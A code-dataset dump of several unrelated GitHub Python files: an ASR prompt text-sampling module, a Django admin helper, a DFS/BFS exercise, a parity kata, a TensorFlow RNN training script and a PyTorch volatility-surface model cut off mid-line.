Suppose we have 2 different transforms A,B, and the preceding text is\n referred to as pre_text. The following three tuples are all valid:\n\n (A(pre_text), A(style_text), A(ref_text))\n (A(pre_text), B(style_text), B(ref_text))\n (A(pre_text), A(style_text), A(ref_text))\n (B(pre_text), B(style_text), B(ref_text))\n\n If transforms is not given, the following pre-defined transforms\n are available:\n 0: original (mixed-cased, with punc)\n 1: upper_only_alpha (upper-cased, no punc)\n\n When the transform of text and pre_text match, we can use the whole\n pre_text as the prompt text.\n\n Args:\n texts (List[str]):\n A list of ref_texts whose first item is the ground truth\n text from books.\n pre_texts (List[str]):\n A list of pre_texts, whose first item is the groundtruth\n pre_text from books.\n context_list: Optional[str] = None,\n A list of biasing words separated by space\n rare_word_list: Optional[str] = None,\n A list of rare-words separated by space (used as distractors)\n transforms (List[Callable[[str], str]]): A list of possible transforms to be applied\n\n Returns:\n A dictionary of ref_text, pre_text, style_text\n Returns:\n str: A dictionary\n \"\"\"\n # import pdb; pdb.set_trace()\n assert len(texts) == len(pre_texts)\n assert len(texts) == 2\n\n if context_list is not None:\n context_list = context_list.lower()\n\n # we assume the first item to be ground truth\n gt_text = texts[0]\n gt_pre_text = pre_texts[0]\n\n if transforms is None:\n transforms = [\n lambda x: x, # return it self\n upper_only_alpha,\n lower_only_alpha,\n lower_all_char,\n ]\n\n sampling_weight = [\n 0.7,\n 0.3,\n 0.0,\n 0.0,\n ] # Mixed-punc should have the largest sampling prob\n\n total_transforms = len(transforms) # do not use the recognized trans\n\n # Select a transformation randomly\n i_text, i_pre_text = np.random.choice(total_transforms, 2, p=sampling_weight)\n\n # get the normalized text and pre_text\n text = transforms[i_text](gt_text)\n pre_text = get_pre_text_with_context_list2(\n text=gt_text,\n pre_text=gt_pre_text,\n context_list=context_list,\n rare_words_list=rare_word_list,\n )\n pre_text = transforms[i_pre_text](pre_text)\n\n if i_text == i_pre_text:\n style_text = get_substring(pre_text, min_len=min_len_style, max_len=150)\n else:\n # get the pre_text of same style as text\n # For now, **don't** do transform to the style text\n style_text = gt_pre_text\n # style_text = pre_texts[i_text] if i_text <= 1 else transforms[i_text-2](gt_pre_text)\n style_text = get_substring(style_text, min_len=min_len_style, max_len=150)\n\n return {\n \"text\": train_text_normalization(text),\n \"pre_text\": train_text_normalization(pre_text),\n \"style_text\": train_text_normalization(style_text),\n \"transform_ids\": i_text,\n }\n\n\ndef get_pre_text_with_context_list(\n text: str,\n pre_text: str,\n context_list: str,\n rare_words_list: List[str] = None,\n) -> str:\n # Always get the first one, which is the gt (mixed-cased trans), but with upper_only_alpha\n # By a small proportion of time, use the substring of ref_text as pre_text\n\n if context_list != \"\" and context_list is not None:\n v = random.random()\n if v < 0.5:\n # correct + distractors\n # sample distractors\n num_distractors = random.randint(0, 50)\n distractors = random.sample(rare_words_list, num_distractors)\n # sample correct\n correct = context_list.split()\n i = random.randint(1, len(correct))\n correct = random.sample(correct, i)\n # combine correct and distractors\n pre_text = distractors + correct\n random.shuffle(pre_text)\n pre_text = \" \".join(pre_text)\n elif v < 0.7:\n splitted = text.split()\n sampling_weights = [len(w) ** 1.2 for w in splitted]\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n num_distractors = random.randint(0, 70)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n pre_text = \" \".join(splitted)\n else:\n pre_text = pre_text\n else:\n v = random.random()\n if v < 0.1:\n splitted = text.split()\n sampling_weights = [len(w) ** 1.2 for w in splitted]\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n pre_text = \" \".join(splitted)\n num_distractors = random.randint(0, 70)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n elif v < 0.2:\n # full distractors\n num_distractors = random.randint(5, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n pre_text = \" \".join(distractors)\n\n elif v < 0.3:\n pre_text = get_substring(text, min_len=15, max_len=150)\n else:\n pre_text = pre_text\n\n return pre_text\n\n\ndef get_pre_text_with_context_list2(\n text: str,\n pre_text: str,\n context_list: str,\n rare_words_list: List[str] = None,\n) -> str:\n # Get the pre_text, either the ground truth preceding text or\n # a list of words consisting of biasing words and distrators\n # By a small proportion of time, use the substring of ref_text as pre_text\n\n if context_list != \"\" and context_list is not None:\n v = random.random()\n if v < 0.4:\n # sample distractors\n num_distractors = random.randint(50, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n # sample correct\n correct = context_list.split()\n i = random.randint(1, len(correct))\n correct = random.sample(correct, i)\n # combine correct and distractors\n pre_text = distractors + correct\n random.shuffle(pre_text)\n pre_text = \" \".join(pre_text)\n elif v < 0.55:\n splitted = text.split()\n sampling_weights = [\n len(w) ** 1.2 for w in splitted\n ] # longer words with higher weights\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n num_distractors = random.randint(50, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n pre_text = \" \".join(splitted)\n else:\n pre_text = pre_text\n else:\n v = random.random()\n if v < 0.3:\n splitted = text.split()\n sampling_weights = [len(w) ** 1.2 for w in splitted]\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n pre_text = \" \".join(splitted)\n num_distractors = random.randint(50, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n elif v < 0.4:\n # full distractors\n num_distractors = random.randint(5, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n pre_text = \" \".join(distractors)\n elif v < 0.6:\n pre_text = get_substring(text, min_len=15, max_len=150)\n else:\n pre_text = pre_text\n\n return pre_text\n\n\ndef naive_triplet_text_sampling(\n texts: List[str],\n pre_texts: List[str],\n context_list: str = None,\n rare_word_list: List[str] = None,\n min_len_style: Optional[int] = 120,\n):\n # The most simplest text sampling function, used only for\n # evaluation, use a fixed sentence as the style text\n\n return {\n \"text\": train_text_normalization(texts[0]),\n \"pre_text\": train_text_normalization(pre_texts[0]),\n \"style_text\": \"Mixed-case English transcription, with punctuation. Actually, it is fully not related. What do you think?\",\n \"transform_ids\": 0,\n }\n\n\ndef random_shuffle_subset(\n data: List[str],\n p: float = 0.2,\n p_mask: float = 0.05,\n) -> List[str]:\n \"\"\"\n Randomly shuffle the subset by probability `p`, which means that p% of the samples\n in the original batch are shuffled, the others are kept in the original order.\n\n With a probability of `p_mask`, replace the original string with an empty string.\n\n \"\"\"\n\n num_to_shuffle = int(len(data) * p)\n id_to_shuffle = np.random.choice(len(data), num_to_shuffle, replace=False)\n item_to_shuffle = [data[id] for id in id_to_shuffle]\n random.shuffle(item_to_shuffle)\n\n for id, item in zip(id_to_shuffle, item_to_shuffle):\n data[id] = item\n\n # Randomly mask a proportion of the data to empty string\n if p_mask > 0:\n for i in range(len(data)):\n if random.random() < p_mask:\n data[i] = \"\"\n\n return data\n\n\nif __name__ == \"__main__\":\n texts = [\n \"AA, BB, cC, dD!\",\n \"AA BB CC DD\",\n ]\n\n pre_texts = [\n \"EE, Ff, Gg? EE, Ff, Gg? EE, Ff, Gg? EE, Ff, Gg?\",\n \"EE FF GG EE FF GG EE FF GG EE FF GG EE FF GG\",\n ]\n for i in range(10):\n print(f\"Run: {i}\")\n print(triplet_text_sampling(texts, pre_texts))\n","repo_name":"k2-fsa/icefall","sub_path":"egs/libriheavy/ASR/zipformer_prompt_asr/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":21496,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"23386901238","text":"import json\nfrom json.decoder import JSONDecodeError\nimport logging\n\nfrom django import forms\nfrom django.forms import widgets\nfrom django.apps import AppConfig\nfrom django.contrib import admin\nfrom django.contrib.admin.sites import AlreadyRegistered\nfrom django.contrib.postgres.fields import JSONField\nfrom django.db.models import Model, ManyToManyField\n\n\nLOGGER = logging.getLogger('django.server')\n\n\nclass PrettyJSONWidget(widgets.Textarea):\n def format_value(self, value):\n try:\n value = json.dumps(json.loads(value), indent=2, sort_keys=True)\n # these lines will try to adjust size of TextArea to fit to content\n row_lengths = [len(r) for r in value.split('\\n')]\n self.attrs['rows'] = min(max(len(row_lengths) + 2, 10), 30)\n self.attrs['cols'] = min(max(max(row_lengths) + 2, 40), 120)\n return value\n except JSONDecodeError as err:\n LOGGER.warning('Error while formatting JSON: %s', err)\n return super(PrettyJSONWidget, self).format_value(value)\n\n\nclass DisplayAllAdmin(admin.ModelAdmin):\n formfield_overrides = {\n ManyToManyField: {'widget': forms.CheckboxSelectMultiple},\n JSONField: {'widget': PrettyJSONWidget},\n }\n\n def __init__(self, model, site):\n self.list_display = [field.name for field in model._meta.fields]\n super(DisplayAllAdmin, self).__init__(model, site)\n\n\nclass _GenericModelFormTemplate(forms.ModelForm):\n # template methods / search fields go in here\n pass\n\n\nclass _GenericModelAdminTemplate(DisplayAllAdmin):\n # any relevant behavioural specifics\n search_fields = ('id', )\n\n\nclass _GenericModelFormMeta(type):\n \"\"\"\n A meta class to control admin form generation.\n\n Reference: http://stackoverflow.com/a/6581949\n \"\"\"\n def __new__(cls, clsname, bases, attrs):\n # making sure we are using the correct class\n if len(bases) < 1: # pragma: no cover\n raise ValueError('GenericAdminForm requires a base class')\n assert issubclass(bases[0], Model)\n\n meta = type('GenericAdminModelFormMeta',\n (object, ),\n {'model': bases[0], 'fields': '__all__'})\n class_dict = {'Meta': meta}\n\n # add user overrides, if specified\n class_dict.update(attrs)\n model_form = type(\n bases[0].__name__ + 'ModelForm',\n (_GenericModelFormTemplate, ),\n class_dict)\n return model_form\n\n\nclass _GenericModelAdminMeta(type):\n \"\"\"\n ``type()`` magic for the ModelAdmin class.\n \"\"\"\n def __new__(cls, clsname, bases, attrs):\n # making sure we are using the correct class\n if len(bases) < 1: # pragma: no cover\n raise ValueError('GenericAdminForm requires a base class')\n\n # django ModelAdmin classes are required to have a Meta member class\n # with a 'model' attribute that points to the model type\n meta = type('GenericAdminModelAdminMeta',\n (object, ),\n {'model': bases[0]})\n class_dict = {'Meta': meta}\n\n # we want all our generic form behaviours to be inherited as well, so\n # add these to the attribute dict.\n class_dict['form'] = _GenericModelFormMeta(\n clsname, bases, attrs)\n class_dict.update(attrs)\n model_admin = type(\n bases[0].__name__ + 'ModelAdmin',\n (_GenericModelAdminTemplate, ),\n class_dict)\n return model_admin\n\n\ndef register_models(models, mixins=None, **attr_dict):\n if mixins is None:\n mixins = ()\n\n mixins = tuple(mixins)\n models = list(models)\n\n model_admins = [\n _GenericModelAdminMeta(x.__name__, (x,) + mixins, attr_dict)\n for x in models\n ]\n\n for model, model_admin in zip(models, model_admins):\n try:\n admin.site.register(model, model_admin)\n except AlreadyRegistered:\n pass\n\n\nclass AdminAppConfig(AppConfig):\n def ready(self):\n register_models(self.get_models())\n","repo_name":"nkprince007/fitbit-subscriber","sub_path":"admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20514250234","text":"def dfs(v):# 시작점\n vi[v] = 1\n print(v, end=' ')\n for d in node[v]:\n if vi[d] == 0:\n dfs(d)\n return\n\ndef bfs(v):\n q.append(v)\n vi[v] = 1\n while q:\n t = q.pop(0)\n print(t, end=' ')\n for s2 in node[t]:\n if vi[s2] == 0:\n q.append(s2)\n vi[s2] = 1\n\n\nn, m, v = map(int, input().split())\nnode = [[] for _ in range(n+1)]\nvi = [0] * (n+1)\nq = []\n\nfor _ in range(m):\n a, b = map(int, input().split())\n node[a].append(b)\n node[b].append(a)\n\nfor d in node:\n d.sort()\n\ndfs(v)\nprint()\nvi = [0] * (n+1)\nbfs(v)\nprint()","repo_name":"SystemOutGirlsAlgorithm/algorithm","sub_path":"8월/2022-08-31/baekjoon_1206_뚜망.py","file_name":"baekjoon_1206_뚜망.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"33800649328","text":"class ParityOutliner:\n \"\"\"\n You are given an array (which will have a length of at least 3, but could be very large) containing integers.\n The array is either entirely comprised of odd integers or entirely comprised of even integers except for a single\n integer N. Write a method that takes the array as an argument and returns this \"outlier\" N.\n \"\"\"\n\n @staticmethod\n def my_case(integers):\n num = [i for i in integers if i % 2 == 0]\n num2 = [i for i in integers if i % 2 != 0]\n return num[0] if len(num) == 1 else num2[0]\n\n @staticmethod\n def best_practice(int):\n odds = [x for x in int if x % 2 != 0]\n evens = [x for x in int if x % 2 == 0]\n return odds[0] if len(odds) < len(evens) else evens[0]\n","repo_name":"SaD-Pr0gEr/codewars","sub_path":"parity_outliner.py","file_name":"parity_outliner.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39695684709","text":"\nimport os\nimport numpy as np\n\nimport tensorflow as tf\n\nfrom sequenceReader import SequenceReader\n\nfrom myCNN import MyCNN\nfrom myRNN import MyRNN\n\nLOAD_CNN = True\nLOAD_RNN = True\nSAVE_MODEL = True\n\ncheckfile = \"imgRNNlr0d001_d1_2x128.ckpt\"\n\nLOAD_CNN_checkpoint_path = \"/home/lianos91/Desktop/training_patches/model_flowCNNnamed/\"\n\nsave_checkpoint_path = \"/home/lianos91/Desktop/training_patches/model_flowRNNcomposite_d1_2x128/\"\n\ntrain_err_file = open(\"train_err_flowRNNcomposite_d1_2x128.txt\", \"a+\")\n# Parameters\nlearning_rate = .0005\ntraining_steps = 200000\ndisplay_step = 100\n\n# Network Parameters\nn_classes = 2 # classes \ndropout = .55 #0.70 # Dropout, probability to keep units\nnlayers = 2\nrnnsize = 128\nmaxseq = 16\nbatchsize = 32\n\ndirpath = \"/home/lianos91/Desktop/training_patches/train_patches_128_64_rich/\"\ndatapath = \"val/\"\nreader = SequenceReader(dirpath,datapath,istest=True,maxsequence=16,isComposite=True)\n\n\n#reader = MySequenceReader(\"train_tiny/\",istest=False,maxsequence=maxseq)\n#reader = MySequenceReader(\"train/\",istest=False,maxsequence=maxseq)\n\n#testreader = MySequenceReader(\"val/\",istest=True,maxsequence=maxseq)\n\n\"\"\"Construct and load pretrained CNN model\"\"\"\nwith tf.variable_scope('flow'):\n CNNbase = MyCNN(n_classes,istrainable=False)\n\nsess = tf.InteractiveSession()\nsaverCNN = tf.train.Saver(tf.all_variables())\n\ninit1 = tf.initialize_all_variables()\nsess.run(init1)\n\nif LOAD_CNN:\n ckpt = tf.train.get_checkpoint_state(LOAD_CNN_checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n print(\"[train_script]: LOADED CNN!\")\n saverCNN.restore(sess, ckpt.model_checkpoint_path)\n else:\n print(\"[train_script]: Failed to LOAD CNN!\")\n raise SystemExit \n\n\n\"\"\"Construct RNN\"\"\"\nrnn_net = MyRNN(n_classes,rnnsize,batchsize,maxseq,CNNbase,400,nlayers)\n#rnn_net = MyRNN(n_classes,rnnsize,batchsize,maxseq,CNNbase,128*64,nlayers)\n#rnn_net = MyRNN(n_classes,rnnsize,batchsize,maxseq,CNNbase,64*64,nlayers)\n\n# Define loss \ncost,preds = rnn_net.calc_cost()\n\n\"\"\"Define Optimization settings\"\"\"\n\nmax_grad_norm = 4\ntvars = tf.trainable_variables()\ngrads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars,aggregation_method=2),\n max_grad_norm)\n \n##get variables e\ntemp = set(tf.all_variables())\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, \n use_locking=False, name='Adam')\ntrain_op = optimizer.apply_gradients(zip(grads, tvars))\n\nprint(\"[train_script]: RNN constructed & Optimization is set\")\n\n#remaining variables = ADAM variables + trainable variables\nremaining_vars = (set(tf.all_variables()) - temp ) | set(tf.trainable_variables())\ninit2 = tf.initialize_variables(remaining_vars)\n\nsaverRNN = tf.train.Saver(tf.all_variables())\n\nsess.run(init2)\n\nprint(\"[train_script]: Initialized\")\n\nstep = 1\n \nif LOAD_RNN:\n ckpt = tf.train.get_checkpoint_state(save_checkpoint_path)\n print(ckpt.model_checkpoint_path) \n print(save_checkpoint_path)\n\n if ckpt and ckpt.model_checkpoint_path:\n print(\"[train_script]: LOADED RNN\")\n saverRNN.restore(sess, ckpt.model_checkpoint_path)\n else:\n print(\"[train_script]: failed to load\")\n raise SystemExit\n last_checkpoint_path = ckpt.model_checkpoint_path\n step = 1+int(last_checkpoint_path[last_checkpoint_path.rindex('-')+1:])\n print(step)\n\nprint(\"[train_script]: Start training\")\n \n# Keep training until reach max iterations\ntmp_train_acc = []\ntmp_test_acc = []\ntrain_cost = []\n\nreader._ignoresmall = 5\n\nwhile step < training_steps:\n \n if (step == -1):\n reader._ignoresmall = 0\n\n seqlen,seq_xs, seq_ys = reader.read_batch(batchsize)\n \n \"\"\"If using the composite dataset, then seq_xs will have a 3rd dimension, which is respectively:\n large_patch: 0\n optical flow: 1\n usual patch: 2 \"\"\"\n seq_xs = seq_xs[:,:,1]\n\n \"\"\"set the weights for sequence samples.\"\"\"\n w = rnn_net.weighting(seqlen,[],'uniform')\n \n \"\"\"seq_xs: maxseq(outer) * batchsize(inner) X img_dim \"\"\"\n \"\"\"seq_ys: batchsize X maxseq \"\"\"\n \"\"\"w : batchsize X maxseq \"\"\"\n \"\"\"seqlen: batchsize X 1 \"\"\"\n \n # Fit training using sequence data\n sess.run( [train_op], feed_dict={rnn_net.x: seq_xs, rnn_net.y: seq_ys, \n rnn_net.keep_prob: dropout, rnn_net.early_stop: seqlen, \n rnn_net.cost_w: w}) \n \"\"\"\"\"\"\n \"\"\"get training and test error\"\"\"\n if step % 2 == 0:\n \n pr,corr_predictions,cst,_ = rnn_net.predict(sess,seq_xs,1.,seqlen,w,seq_ys) \n tmp_train_acc.extend(corr_predictions)\n train_cost.append(cst)\n\n if step % display_step == 0:\n\n #output mean training accuracy of past sequences\n m = np.mean(np.array(tmp_train_acc,np.float32))\n m3 = np.mean(np.array(train_cost,np.float32))\n m4 = np.std(np.array(train_cost,np.float32))\n print(\"[train_script]: Step: \"+str(step)+ \", train_acc {:.3f}\".format(m))\n print(\"train_mean_cost {:.3f}\".format(m3)+ \", train_cost_std {:.3f}\".format(m4) )\n train_err_file.write(\"\"+str(m3)+\",\"+str(m)+\"\\n\")\n tmp_train_acc = []\n train_cost = []\n\n #checkpoint save\n if step % (10*display_step) == 0 and SAVE_MODEL:\n print(\"[train_script]: checkpoint\")\n checkpoint_path = os.path.join(save_checkpoint_path, checkfile)\n saverRNN.save(sess, checkpoint_path, global_step=step) \n step += 1\n \n \ntrain_err_file.close()\n\nreader.terminate = True\nprint(\"[train_script]: Optimization Finished!\")\nif SAVE_MODEL:\n print(\"[train_script]: checkpoint\")\n checkpoint_path = os.path.join(save_checkpoint_path, checkfile)\n saverRNN.save(sess, checkpoint_path, global_step=step)\n\n","repo_name":"lianoskn/semesterProject-DNN","sub_path":"src/main_trainRnn.py","file_name":"main_trainRnn.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41699312553","text":"#Import modules\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import DatetimeIndex\r\nimport dask\r\nimport scipy\r\nimport time\r\nimport glob\r\nimport torch\r\nimport torch.nn as nn\r\nfrom live_plotter import live_plotter\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nimport pickle\r\n\r\nfrom functools import partial\r\nfrom abc import ABCMeta, abstractmethod\r\n\r\nimport plottingTools\r\nimport factorialModel\r\nimport loadData\r\n\r\ntmpFolder = \"./tmp/\" #\"./../tmp/\"\r\n#tmpFolder = os.environ['tmp']\r\n\r\n\r\nclass Functional_encoder(nn.Module):\r\n def __init__(self, n_factor):\r\n super(Functional_encoder, self).__init__()\r\n\r\n self.linear1 = nn.Linear(n_factor + 2, 20)\r\n self.linear2 = nn.Linear(20, 1)\r\n # self.linear2 = nn.Linear(20, 20)\r\n # self.linear3 = nn.Linear(20, 1)\r\n\r\n def forward(self, x):\r\n x = self.linear1(x)\r\n x = torch.tanh(x)\r\n x = self.linear2(x)\r\n # x = torch.tanh(x)\r\n # x = self.linear3(x)\r\n return x\r\n\r\n\r\nclass Code(nn.Module):\r\n def __init__(self, n_obs, n_factor, initialValue = None):\r\n super(Code, self).__init__()\r\n # self.code = nn.Parameter(torch.normal(0, 1, size=(n_obs, n_factor)), requires_grad=True)\r\n initialValueTorch = torch.zeros((n_obs, n_factor)) if initialValue is None else torch.tensor( np.reshape(initialValue, (n_obs, n_factor) ).astype(np.float32) ).float()\r\n self.code = nn.Parameter(initialValueTorch, requires_grad=True)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass pytorchModel(factorialModel.FactorialModel) :\r\n #######################################################################################################\r\n #Construction functions\r\n #######################################################################################################\r\n def __init__(self,\r\n learningRate, \r\n hyperParameters, \r\n nbUnitsPerLayer, \r\n nbFactors,\r\n modelName = \"./bestPyTorchModel\"):\r\n #pytorch objects \r\n self.optimizer = None\r\n self.optimizer_code = None \r\n \r\n self.MeanFwd = 0\r\n self.StdFwd = 1\r\n self.MeanLogMaturity = 0\r\n self.StdLogMaturity = 1\r\n self.MeanLogMoneyness = 0\r\n self.StdLogMoneyness = 0\r\n \r\n super().__init__(learningRate, hyperParameters, nbUnitsPerLayer, nbFactors, \r\n modelName = modelName)\r\n \r\n self.metaModelName = self.metaModelName.replace(\".cpkt\", \"Torch\")\r\n self.metaModelNameInit = self.metaModelNameInit.replace(\".cpkt\", \"Torch\") \r\n \r\n #Build the architecture, losses and optimizer.\r\n def buildModel(self):\r\n self.fe = Functional_encoder(self.nbFactors) #Neural network architecture\r\n return\r\n \r\n \r\n #######################################################################################################\r\n #Training functions\r\n #######################################################################################################\r\n #Extract for each day the volatility value as output values the coordinates as input input values\r\n def getLocationFromDatasetList(self, dataSet):\r\n if dataSet[1].ndim > 1 :#historical data\r\n nbObs = dataSet[1].shape[0]\r\n nbPoints = dataSet[1].shape[1]\r\n \r\n vol = dataSet[0].values if dataSet[0] is not None else dataSet[0]\r\n \r\n coordinates = dataSet[1]\r\n yCoor = np.ravel(coordinates.applymap(lambda x : x[1]))\r\n xCoor = np.ravel(coordinates.applymap(lambda x : x[0]))\r\n l_Feature = np.reshape(np.vstack([xCoor, yCoor]).T, (nbObs, nbPoints, 2))\r\n else :#Data for a single day\r\n nbObs = 1\r\n nbPoints = dataSet[1].shape[0]\r\n \r\n vol = np.expand_dims(dataSet[0].values, 0) if dataSet[0] is not None else dataSet[0]\r\n \r\n coordinates = dataSet[1]\r\n yCoor = np.ravel(coordinates.map(lambda x : x[1]))\r\n xCoor = np.ravel(coordinates.map(lambda x : x[0]))\r\n l_Feature = np.reshape(np.vstack([xCoor, yCoor]).T, (nbObs, nbPoints, 2))\r\n \r\n return l_Feature, vol\r\n \r\n \r\n #Sample Mini-batch\r\n def generateMiniBatches(self, dataSetList, nbEpoch):\r\n batchSize = 100\r\n #return self.selectMiniBatchWithoutReplacement(dataSetList, batchSize)\r\n return [dataSetList]\r\n \r\n \r\n def splitValidationAndTrainingSet(self, dataSetTrainList):\r\n #Sample days in validation set\r\n percentageForValidationSet = self.hyperParameters['validationPercentage'] if ('validationPercentage' in self.hyperParameters) else 0.2\r\n #validationSetDays = dataSetTrainList[0].sample(frac=percentageForValidationSet,\r\n # replace=False).sort_index().index \r\n #select Time series ends\r\n nbValidationSetDays = int(percentageForValidationSet * dataSetTrainList[0].index.size)\r\n validationSetDays = dataSetTrainList[0].index[-nbValidationSetDays:]\r\n \r\n validationDataSetList = [x.loc[validationSetDays].sort_index() if x is not None else None for x in dataSetTrainList]\r\n trainingDataSetList = [x.drop(validationSetDays).sort_index() if x is not None else None for x in dataSetTrainList]\r\n return validationDataSetList, trainingDataSetList\r\n \r\n #Sample minibatch of size batchSize for a list of dataset \r\n def selectMiniBatchWithoutReplacement(self, dataSetList, batchSize):\r\n miniBatchList = []\r\n if len(dataSetList)==0:\r\n return miniBatchList\r\n \r\n nbObs = dataSetList[0].shape[0]\r\n idx = np.arange(nbObs)\r\n np.random.shuffle(idx)\r\n nbBatches = int(np.ceil(nbObs/batchSize))\r\n \r\n lastIndex = 0\r\n for k in range(nbBatches) :\r\n firstIndex = k * batchSize\r\n lastIndex = (k+1) * batchSize\r\n miniBatchIndex = idx[firstIndex:lastIndex]\r\n \r\n miniBatch = [x.iloc[miniBatchIndex,:] for x in dataSetList] \r\n miniBatchList.append(miniBatch)\r\n \r\n #We add observations which were not drawn to use a full epoch\r\n lastIndex = (nbBatches) * batchSize\r\n miniBatchIndex = idx[lastIndex:]\r\n miniBatch = [x.iloc[miniBatchIndex,:] for x in dataSetList] \r\n miniBatchList.append(miniBatch)\r\n \r\n return miniBatchList\r\n \r\n #Sample minibatch of size batchSize for a list of dataset with replacement\r\n def selectMiniBatchWithReplacement(self, dataSetList, batchSize):\r\n miniBatchList = []\r\n if len(dataSetList)==0:\r\n return miniBatchList\r\n \r\n nbObs = dataSetList[0].shape[0]\r\n nbBatches = int(np.ceil(nbObs/batchSize))\r\n \r\n lastIndex = 0\r\n for k in range(nbBatches+1) :\r\n miniBatchIndex = dataSetList[0].sample(n=batchSize,replace=False).index \r\n miniBatch = [x.iloc[miniBatchIndex,:] for x in dataSetList] \r\n miniBatchList.append(miniBatch)\r\n \r\n return miniBatchList\r\n \r\n def train(self, inputTrain, nbEpoch, inputTest = None):\r\n \r\n self.MeanFwd = np.nanmean(np.ravel(inputTrain[2]))\r\n self.StdFwd = np.nanstd(np.ravel(inputTrain[2]))\r\n self.MeanLogMaturity = np.nanmean(self.getLogMaturities(inputTrain))\r\n self.StdLogMaturity = np.nanstd(self.getLogMaturities(inputTrain))\r\n self.MeanLogMoneyness = np.nanmean(self.getLogMoneyness(inputTrain))\r\n self.StdLogMoneyness = np.nanstd(self.getLogMoneyness(inputTrain))\r\n \r\n self.restoringGraph()\r\n nbDays = inputTrain[0].shape[0]\r\n self.code = Code(nbDays, self.nbFactors) #Latent variables\r\n self.optimizer = torch.optim.Adam(self.fe.parameters(), lr=1e-2) #Optimizer for fe\r\n self.optimizer_code = torch.optim.Adam(self.code.parameters(), lr=1e-2) #Optimizer for code\r\n \r\n #x_vec = np.linspace(0, 1, 1000 + 1)[0:-1] \r\n #y_vec = np.zeros(len(x_vec))\r\n \r\n line1 = []\r\n trainingLoss = []\r\n def getLogMaturities(batch):\r\n return batch[1].applymap(lambda x : np.log(x[0] / 252.0))\r\n\r\n for __ in range(nbEpoch):#range(100000): #Number of epochs\r\n res_ = []\r\n \r\n miniBatchIndex = np.random.choice(nbDays, 200) if (200 <= nbDays) else np.arange(nbDays)\r\n for k in miniBatchIndex : #random mini-batch\r\n batch = [(elt.iloc[k] if elt is not None else None) for elt in inputTrain]\r\n keptCols = batch[0].dropna().index # batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batch ]\r\n \r\n tensorList = self.evalBatch(batch, self.code.code[k, :])\r\n \r\n res_.append( tensorList[2] ) #mean of squared errors for each observation\r\n res = torch.mean(torch.stack(res_)) #Mean along mini-batches : training loss\r\n \r\n # res += torch.mean(torch.mean(code.code))**2 + (torch.mean(torch.mean(code.code**2)-1))**2\r\n\r\n if __ < 300:#Pre-train only neural network\r\n self.optimizer.zero_grad() #set gradient to zero\r\n res.backward() #compute loss gradient wrt neural weights\r\n self.optimizer.step() #update neural weights and go to next iteration\r\n\r\n else:#Train neural network and codes\r\n self.optimizer.zero_grad() #set gradient wrt neural weights to zero\r\n self.optimizer_code.zero_grad() #set gradient wrt code\r\n res.backward() # compute loss gradient by AAD\r\n self.optimizer.step() #Update neural weights\r\n self.optimizer_code.step() #Update code\r\n \r\n trainingLoss.append(np.sqrt(res.item()))\r\n print(__, trainingLoss[-1]) #print RMSE\r\n if trainingLoss[-1] <= min(trainingLoss) :\r\n if self.verbose :\r\n print(\"New Best error : \", trainingLoss[-1])\r\n self.saveModel(self.metaModelName + \"fe\")#save neural weights\r\n torch.save(self.code.state_dict(), self.metaModelName + \"code\") #save code\r\n #y_vec[-1] = trainingLoss[-1]\r\n #line1 = live_plotter(x_vec, y_vec, line1)\r\n #y_vec = np.append(y_vec[1:], 0.0)\r\n \r\n \r\n \r\n return np.array(trainingLoss)\r\n \r\n def serializeObject(self, object, fileName):\r\n #Delete former file version\r\n #for f in glob.glob(fileName + \"*\"):\r\n # os.remove(f)\r\n \r\n with open(fileName, \"wb\") as f :\r\n pickle.dump(object, f, protocol=3)\r\n \r\n return\r\n \r\n def readObject(self, fileName):\r\n with open(fileName, \"rb\") as f :\r\n object = pickle.load(f)\r\n \r\n return object\r\n \r\n #save metamodel (graph and variable values)\r\n def saveModel(self, pathFile): \r\n #Delete former file version\r\n for f in glob.glob(pathFile + \"*\"):\r\n os.remove(f)\r\n torch.save(self.fe.state_dict(), pathFile) #save neural weights\r\n \r\n scalingValue = [self.MeanFwd, self.StdFwd, self.MeanLogMaturity, self.StdLogMaturity, self.MeanLogMoneyness, 